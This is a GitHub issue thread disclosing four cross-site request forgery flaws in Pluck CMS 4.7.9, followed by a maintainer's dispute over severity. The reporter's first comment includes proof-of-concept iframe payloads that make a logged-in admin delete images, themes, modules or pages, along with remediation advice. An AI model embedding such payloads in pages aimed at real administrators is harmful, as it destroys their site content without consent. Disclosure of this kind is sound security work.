Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Four CSRF vulnerabilities in pluck cms 4.7.9 #69

Open
China-Eugene opened this Issue Feb 18, 2019 · 4 comments

Comments

Projects
None yet
2 participants
@China-Eugene
Copy link

China-Eugene commented Feb 18, 2019

One: use CSRF vulnerability to delete pictures
Vulnerability details:
When the administrator logs in, opening the webpage will automatically delete the specified image.
Vulnerability url: http://127.0.0.1/pluck/admin.php?action=images
Vulnerability POC:

<iframe src="http://127.0.0.1/pluck/admin.php?action=deleteimage&var1=test.jpg" >

Two: use the CSRF vulnerability to delete the topic
Vulnerability details:
When the administrator logs in, opening the web page will automatically delete the specified topic.
Vulnerability url: http://127.0.0.1/pluck/admin.php?action=theme
Vulnerability POC:

<iframe src="http://127.0.0.1/pluck/admin.php?action=theme_delete&var1=oldstyl">

Three: use CSRF vulnerability to remove the module
Vulnerability details:
When the administrator logs in, open the webpage and the specified module will be deleted automatically.
Vulnerability url: http://127.0.0.1/pluck/admin.php?action=modules
Vulnerability POC:

<iframe src="http://127.0.0.1/pluck/admin.php?action=module_delete&var1=albums " >

Four: use CSRF vulnerability to delete pictures
Vulnerability details:
When the administrator logs in, opening the web page will automatically delete the specified article.
Vulnerability url: http://127.0.0.1/pluck/admin.php?action=page
Vulnerability POC:

<iframe src="http://127.0.0.1/pluck/admin.php?action=deletepage&var1=aaaa">

Vulnerability suggestions:
One: Detect user submissions by referer, token, or verification code.
Second: It is best to use the post operation for users to modify and delete.

@China-Eugene

This comment has been minimized.

Copy link
Author

China-Eugene commented Feb 18, 2019

The fourth is to use the CSRF vulnerability to delete articles

@BSteelooper

This comment has been minimized.

Copy link
Contributor

BSteelooper commented Feb 19, 2019

Funny, even github is vulnerable.. it opened a new window for me ;)

How would you exploit this?

Admins are instructed to go to the domain.tld/login.php to logon to Pluck.
Than after this they randomly go to your constructed website in which you know which page/ image etc exists and delete this?

Please explain an attack vector in which the admin is not willingly logged on to the admin page.

@BSteelooper

This comment has been minimized.

Copy link
Contributor

BSteelooper commented Feb 19, 2019

Dear Eugene,

Thank you for the thumbs down emoji. You deleted your comment that I will never understand security, since you don't know me, you cannot state this fact. I am a Penetration Tester since 2008 and have successfully penetrated several applications and websites. You have several types of attack vectors. For this you need two, Social Engineering and Phishing.

With a code audit (which is now possible as you stated that it is open source) you can maybe find exploits. Lots have been found and fixed. We are always open to learn about new exploits and bugs.
Issues which require a login before being able to be exploited are very hard to exploit. The attack vector is so small and complicated that the risk is near zero. Since two attack vectors need to be combined and the type of end user for this product I cannot find any reason to believe that a hacker would invest that amount of effort and time into an exploit which than easily can be undone by recovering the item from the trash bin.

If you see another attack vector which can be used at this moment please let me know and I will certainly fix this for you, until then it is rated LOW and I think it will be a won't fix.

Waiting for you reply,

Kind regards,
Bas

@China-Eugene

This comment has been minimized.

Copy link
Author

China-Eugene commented Feb 19, 2019

Hi Bas Steelooper,I sent an email to your steelooper mailbox.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.